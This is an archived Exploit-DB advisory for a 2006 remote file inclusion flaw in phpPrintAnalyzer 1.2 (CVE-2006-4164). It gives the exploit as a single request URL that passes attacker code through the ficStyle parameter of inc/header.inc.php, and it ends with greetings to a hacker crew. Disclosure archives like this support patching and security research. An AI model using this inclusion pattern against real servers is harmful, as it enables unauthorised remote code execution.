phpPrintAnalyzer <= 1.2 - Remote File Include Vulnerability

2006-08-10T00:00:00
ID EDB-ID:2168
Type exploitdb
Reporter Cmaster4
Modified 2006-08-10T00:00:00

Description

phpPrintAnalyzer <= 1.2 Remote File Include Vulnerability. CVE-2006-4164. Webapps exploit for php platform

                                        
                                            #title: phpPrintAnalyzer Inclusion Vulnerability
 
#Author: Cmaster4 #batamhacker irc.dal.net
 
#script: phpPrintAnalyzer
 
#Class : Remote
 
#cont@ct: gaul@enet.com.cn
 
#Exploit:
http://site.com/[path]/inc/header.inc.php?ficStyle=[evilcode]

Thx to :
#batamhacker crew on dal.net h4ntu, havincaz, baylaw and all indonesian underground hacker

# milw0rm.com [2006-08-10]